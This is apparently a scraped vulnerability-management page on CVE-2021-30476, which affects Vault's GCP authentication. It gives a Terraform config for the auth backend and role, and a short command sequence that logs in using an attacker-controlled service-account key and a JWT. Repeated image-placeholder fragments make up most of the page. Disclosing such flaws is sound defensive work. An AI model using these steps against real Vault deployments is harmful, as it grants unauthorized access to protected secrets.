GET A DEMO
Google Cloud affected by CVE-2021-30476
DevSecOpsUnified Vulnerability Management
resource "vault_gcp_auth_backend" "example" { backend = "gcp" credentials = "${file("credentials.json")}" project_id = "my-gcp-project" bound_projects = ["my-gcp-project"]}resource "vault_gcp_auth_backend_role" "my_role" { backend = vault_gcp_auth_backend.example.backend role = "my-role" type = "iam" policies = ["default", "dev", "prod"] bound_service_accounts = ["my-service-account@my-gcp-project.iam.gserviceaccount.com"]}
gcloud auth activate-service-account --key-file=attacker-controlled-account.jsonexport VAULT_ADDR='http://127.0.0.1:8200'vault write auth/gcp/login role="my-role" jwt="eyJhbGciOiJSUzI1NiIsImtpZCI6I..."
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30)){kind=logo}
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))